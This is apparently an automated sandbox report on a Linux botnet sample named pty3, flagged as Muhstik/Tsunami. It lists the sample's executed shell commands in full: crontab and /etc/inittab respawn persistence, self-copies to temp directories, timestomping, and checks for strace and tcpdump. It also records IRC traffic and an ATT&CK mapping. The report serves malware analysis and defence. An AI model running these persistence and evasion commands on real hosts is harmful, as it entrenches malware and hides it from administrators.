Source: /bin/sh (PID: 5312) | Grep executable: /usr/bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5309) | Grep executable: /usr/bin/grep -> grep -v /var/lock/pty3
Source: /bin/sh (PID: 5333) | Grep executable: /usr/bin/grep -> grep /var/run/pty3
Source: /bin/sh (PID: 5334) | Grep executable: /usr/bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5331) | Grep executable: /usr/bin/grep -> grep -v /var/run/pty3
Source: /usr/bin/crontab (PID: 5251) | Crontab like entry written: /var/spool/cron/crontabs/tmp.l3d2Df
Source: /usr/bin/crontab (PID: 5274) | Crontab like entry written: /var/spool/cron/crontabs/tmp.OnJidY
Source: /usr/bin/crontab (PID: 5295) | Crontab like entry written: /var/spool/cron/crontabs/tmp.u6tmyy
Source: /usr/bin/crontab (PID: 5317) | Crontab like entry written: /var/spool/cron/crontabs/tmp.pRPXld
Source: /usr/bin/crontab (PID: 5337) | Crontab like entry written: /var/spool/cron/crontabs/tmp.qQwB9I
Source: /tmp/pty3 (PID: 5229) | Shell command executed: sh -c "pidof -x strace > /dev/null"
Source: /tmp/pty3 (PID: 5232) | Shell command executed: sh -c "pidof -x tcpdump > /dev/null"
Source: /tmp/pty3 (PID: 5239) | Shell command executed: sh -c "crontab -r"
Source: /tmp/pty3 (PID: 5240) | Shell command executed: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
Source: /tmp/pty3 (PID: 5238) | Shell command executed: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"
Source: /tmp/pty3 (PID: 5249) | Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
Source: /tmp/pty3 (PID: 5253) | Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"
Source: /tmp/pty3 (PID: 5255) | Shell command executed: sh -c "rm -rf /etc/inittab2"
Source: /tmp/pty3 (PID: 5257) | Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"
Source: /tmp/pty3 (PID: 5261) | Shell command executed: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
Source: /tmp/pty3 (PID: 5267) | Shell command executed: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"
Source: /tmp/pty3 (PID: 5266) | Shell command executed: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"
Source: /tmp/pty3 (PID: 5276) | Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
Source: /tmp/pty3 (PID: 5277) | Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"
Source: /tmp/pty3 (PID: 5279) | Shell command executed: sh -c "rm -rf /etc/inittab2"
Source: /tmp/pty3 (PID: 5281) | Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"
            Source: /tmp/pty3 (PID: 5283)Shell command executed: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5287)Shell command executed: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5286)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5293)Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5297)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5299)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5301)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5303)Shell command executed: sh -c "cp -f /tmp/pty3 /var/lock/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5307)Shell command executed: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5306)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5315)Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5319)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5321)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5323)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5325)Shell command executed: sh -c "cp -f /tmp/pty3 /var/run/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5329)Shell command executed: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5328)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5335)Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5339)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5341)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5343)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5262)Shell command executed: sh -c "/bin/uname -n"Jump to behavior
            Source: /bin/sh (PID: 5256)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5280)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5300)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5322)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5342)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5258)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5282)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5302)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5324)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5344)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: submitted sampleStderr: cat: /etc/inittabno crontab for rootno crontab for root: No such file or directoryno crontab for root: exit code = 0

            Hooking and other Techniques for Hiding and Protection:

            Uses known network protocols on non-standard ports
            Source: unknown | Network traffic detected: IRC traffic on port 35994 -> 8080
            Source: /bin/uname (PID: 5264) | Queries kernel information via 'uname'

            Stealing of Sensitive Information:

            Yara detected Muhstik
            Source: Yara match | File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected Tsunami
            Source: Yara match | File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

            Remote Access Functionality:

            Yara detected Muhstik
            Source: Yara match | File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected Tsunami
            Source: Yara match | File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Scheduled Task/Job [1][1] | Scheduled Task/Job [1][1] | Scheduled Task/Job [1][1] | Scripting [1] | OS Credential Dumping | Security Software Discovery [1] | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scripting [1] | At (Linux) [1] | At (Linux) [1] | Timestomp [1] | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port [1][1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) [1] | Logon Script (Windows) | Logon Script (Windows) | Indicator Removal on Host [1] | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol [1] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | File Deletion [1] | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [1][2] | SIM Card Swap | | Carrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            [Behavior Graph ID: 543493, Sample: pty3, Startdate: 21/12/2021, Architecture: LINUX, Score: 96]